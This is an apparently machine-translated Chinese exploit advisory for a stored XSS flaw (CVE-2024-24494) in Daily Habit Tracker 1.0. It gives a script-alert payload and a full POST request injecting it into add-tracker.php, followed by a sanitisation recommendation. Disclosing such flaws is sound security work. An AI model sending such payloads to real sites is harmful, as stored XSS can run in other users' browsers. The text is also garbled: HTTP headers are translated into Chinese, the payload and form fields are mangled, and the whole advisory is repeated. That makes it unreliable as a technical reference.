#利用标题:每日习惯追踪器1.0-存储的跨站点脚本(XSS)
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24494
###存储的跨站点脚本(XSS):
存储的跨站点脚本(XSS)是一个Web安全漏洞,攻击者将恶意脚本注入Web应用程序的数据库。恶意脚本保存在服务器上,然后在其他用户的浏览器中渲染。当其他用户访问受影响的页面时,存储的脚本执行,可能会窃取数据或损害用户安全性。
###受影响的组件:
add-tracker.php,update-tracker.php
脆弱的参数:
“添加跟踪器”和“更新跟踪器请求中的多个参数都容易受到存储的跨站点脚本的影响。该应用程序在将用户输入存储到数据库时无法消毒用户输入,并反思回到页面上。
##概念证明:
可以使用以下有效载荷`scriptalert('stord_xss')/脚本“来利用漏洞。
以下是请求的示例
````````
POST/HABIT-TRACKER/ENDPOINT/ADD-TRACKER.PHP http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 175
Origin: http://localhost
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
日期=1992-01-12DAY=星期二%3cscript%3ealert%28%27STORED_XSS%27%29%3C%2fscript%3eexercise=yespray=yespray=yesRead_book=yesVitamines=yesVitamines=yeslaundry=yesalColol=yesalChoil=yesMeat=yesMeat=yesmeat=yesmeat=yes
````````
##建议
使用此跟踪系统时,必须更新应用程序代码,以确保用户输入消毒和适当的特殊字符限制。
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24494
###存储的跨站点脚本(XSS):
存储的跨站点脚本(XSS)是一个Web安全漏洞,攻击者将恶意脚本注入Web应用程序的数据库。恶意脚本保存在服务器上,然后在其他用户的浏览器中渲染。当其他用户访问受影响的页面时,存储的脚本执行,可能会窃取数据或损害用户安全性。
###受影响的组件:
add-tracker.php,update-tracker.php
脆弱的参数:
- 天
- 锻炼
- 祈祷
- read_book
- 维生素
- 洗衣店
- 酒精
- 肉
“添加跟踪器”和“更新跟踪器请求中的多个参数都容易受到存储的跨站点脚本的影响。该应用程序在将用户输入存储到数据库时无法消毒用户输入,并反思回到页面上。
##概念证明:
可以使用以下有效载荷`scriptalert('stord_xss')/脚本“来利用漏洞。
以下是请求的示例
````````
POST/HABIT-TRACKER/ENDPOINT/ADD-TRACKER.PHP http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 175
Origin: http://localhost
DNT: 1
连接:关闭
Referer: http://localhost/habe-tracker/home.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
日期=1992-01-12DAY=星期二%3cscript%3ealert%28%27STORED_XSS%27%29%3C%2fscript%3eexercise=yespray=yespray=yesRead_book=yesVitamines=yesVitamines=yeslaundry=yesalColol=yesalChoil=yesMeat=yesMeat=yesmeat=yesmeat=yes
````````
##建议
使用此跟踪系统时,必须更新应用程序代码,以确保用户输入消毒和适当的特殊字符限制。